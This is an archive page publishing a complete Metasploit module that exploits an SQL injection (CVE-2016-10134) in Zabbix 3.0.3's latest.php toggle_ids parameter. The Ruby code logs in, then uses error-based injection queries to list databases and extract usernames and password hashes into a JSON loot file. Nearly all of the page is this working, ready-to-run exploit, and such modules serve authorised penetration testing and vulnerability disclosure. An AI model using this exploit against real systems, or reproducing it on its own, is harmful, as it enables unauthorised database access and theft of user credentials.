Zabbix toggle_ids SQL Injection

Zabbix toggle_ids SQL Injection: Posted Aug 31, 2024; Authored by bperry, 1n3[at]hushmail.com | Site metasploit.com; This Metasploit module will exploit a SQL injection in Zabbix 3.0.3 and likely prior in order to save the current usernames and password hashes from the database to a JSON file.; tags | exploit, sql injection; advisories | CVE-2016-10134; SHA-256 | 2ebbd2d691dd7508785002385cab0f09585ac3584018b08791e074e76431981a; Download | Favorite | View

Zabbix toggle_ids SQL Injection

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zabbix toggle_ids SQL Injection',
      'Description'    => %q{
      This module will exploit a SQL injection in Zabbix 3.0.3 and
      likely prior in order to save the current usernames and
      password hashes from the database to a JSON file.
      },
      'References'     =>
        [
          ['CVE', '2016-10134'],
          ['URL', 'https://seclists.org/fulldisclosure/2016/Aug/60']
        ],
      'Author'         =>
        [
          '1n3@hushmail.com', #discovery
          'bperry' #module
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2016-08-11'
    ))

    register_options(
      [
        OptBool.new('REQUIREAUTH', [true, 'Enforce authentication', false]),
        OptString.new('USERNAME', [false, 'The username to authenticate with', 'Admin']),
        OptString.new('PASSWORD', [false, 'The password to authenticate with', 'zabbix']),
        OptString.new('TARGETURI', [true, 'The relative URI for Zabbix', '/zabbix'])
      ])
  end

  def check

    sid, cookies = authenticate

    left_marker = Rex::Text.rand_text_alpha(5)
    right_marker = Rex::Text.rand_text_alpha(5)
    flag = Rex::Text.rand_text_alpha(5)

    query = "AND (SELECT 1256 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
    query << ",(SELECT MID((IFNULL(CAST(0x#{flag.unpack("H*")[0]} AS CHAR),0x20)),1,54)"
    query << " FROM dual LIMIT 0,1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"
    query << ' INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'

    res = make_injected_request(query, sid, cookies)

    unless res and res.body
      return Msf::Exploit::CheckCode::Safe
    end

    match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

    unless match
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    if match[1] == flag
      return Msf::Exploit::CheckCode::Vulnerable
    end

    Msf::Exploit::CheckCode::Safe
  end

  def run
    sid, cookies = authenticate

    left_marker = Rex::Text.rand_text_alpha(5)
    right_marker = Rex::Text.rand_text_alpha(5)

    query = " AND (SELECT 5361 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
    query << ",(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM"
    query << " INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x"
    query << " FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

    res = make_injected_request(query, sid, cookies)

    unless res and res.body
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

    unless match
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    count = match[1].to_i

    dbs = []
    0.upto(count-1) do |cur|

      get_dbs = " AND (SELECT 5184 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
      get_dbs << ",(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54)"
      get_dbs << " FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{cur},1),0x#{right_marker.unpack("H*")[0]},"
      get_dbs << "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

      res = make_injected_request(get_dbs, sid, cookies)

      unless res and res.body
        fail_with(Failure::Unknown, 'Server did not respond in an expected way')
      end

      match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

      unless match
        fail_with(Failure::Unknown, 'Server did not respond in an expected way')
      end

      dbs << match[1]
    end

    dbs.delete("mysql")
    dbs.delete("performance_schema")
    dbs.delete("information_schema")

    users = []
    dbs.each do |db|
      cols = ["alias", "passwd"]

      user_count = " AND (SELECT 6262 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
      user_count << ",(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM"
      user_count << " #{db}.users),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"
      user_count << " INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

      res = make_injected_request(user_count, sid, cookies)

      unless res and res.body
        fail_with(Failure::Unknown, 'Server did not respond in an expected way')
      end

      match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

      unless match
        fail_with(Failure::Unknown, 'Server did not respond in an expected way')
      end

      count = match[1].to_i

      0.upto(count-1) do |cur|
        user = {}
        cols.each do |col|
          get_col = " AND (SELECT 6334 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
          get_col << ",(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),1,54)"
          get_col << " FROM #{db}.users ORDER BY alias LIMIT #{cur},1),0x#{right_marker.unpack("H*")[0]}"
          get_col << ',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'

          res = make_injected_request(get_col, sid, cookies)

          unless res and res.body
            fail_with(Failure::Unknown, 'Server did not respond in an expected way')
          end

          match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

          unless match
            fail_with(Failure::Unknown, 'Server did not respond in an expected way')
          end

          user[col] = match[1]
        end
        users << user
      end
    end

    loot = store_loot("zabbixusers.json","text/plain", rhost, users.to_json)

    print_good('Users and password hashes stored at ' + loot)

  end

  def authenticate
   res = send_request_cgi({
     'uri' => normalize_uri(target_uri.path, 'index.php')
   })

   unless res and res.body
     fail_with(Failure::Unknown, 'Server did not respond in an expected way')
   end

   cookies = res.get_cookies

   match = /name="sid" value="(.*?)">/.match(res.body)

   unless match
     fail_with(Failure::Unknown, 'Server did not respond in an expected way')
   end

   sid = match[1]

   if datastore['REQUIREAUTH']

     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'method' => 'POST',
       'vars_post' => {
         'sid' => sid,
         'form_refresh' => 1,
         'name' => datastore['USERNAME'],
         'password' => datastore['PASSWORD'],
         'autologin' => 1,
         'enter' => 'Sign in'
       },
       'cookie' => cookies
     })

     unless res
       fail_with(Failure::Unknown, 'Server did not respond in an expected way')
     end

     if res.code == 302
       cookies = res.get_cookies

       res = send_request_cgi({
         'uri' => normalize_uri(target_uri.path, 'latest.php'),
         'vars_get' => {
          'ddreset' => '1'
         },
         'cookies' => cookies
       })

       unless res and res.body
         fail_with(Failure::Unknown, 'Server did not respond in an expected way')
       end

       cookies = res.get_cookies
       match = /name="sid" value="(.*?)">/.match(res.body)

       unless match
         fail_with(Failure::Unknown, 'Server did not respond in an expected way')
       end

       sid = match[1]
     elsif
       fail_with(Failure::Unknown, 'Server did not respond in an expected way')
     end
   end

   return sid, cookies
  end

  def make_injected_request(sql, sid, cookies)
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'latest.php'),
      'method' => 'POST',
      'vars_get' => {
        'output' => 'ajax',
        'sid' => sid
      },
      'vars_post' => {
        'favobj' => 'toggle',
        'toggle_ids[]' => '348 ' + sql,
        'toggle_open_state' => 0
      },
      'cookie' => cookies
    })
  end
end

Top Authors In Last 30 Days

Red Hat 219 files
indoushka 133 files
Jay Turla 131 files
Ubuntu 59 files
h00die 35 files
Gentoo 33 files
sinn3r 29 files
Debian 27 files
juan vazquez 27 files
H D Moore 23 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (58)
Cisco (1,948)
Debian (7,112)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (386)
iPhone (108)
IRIX (220)
Juniper (70)
Linux (50,967)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,661)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,789)
UNIX (9,443)
UnixWare (187)
Windows (6,739)
Other

Zabbix toggle_ids SQL Injection

Zabbix toggle_ids SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Zabbix toggle_ids SQL Injection

Share This

Zabbix toggle_ids SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems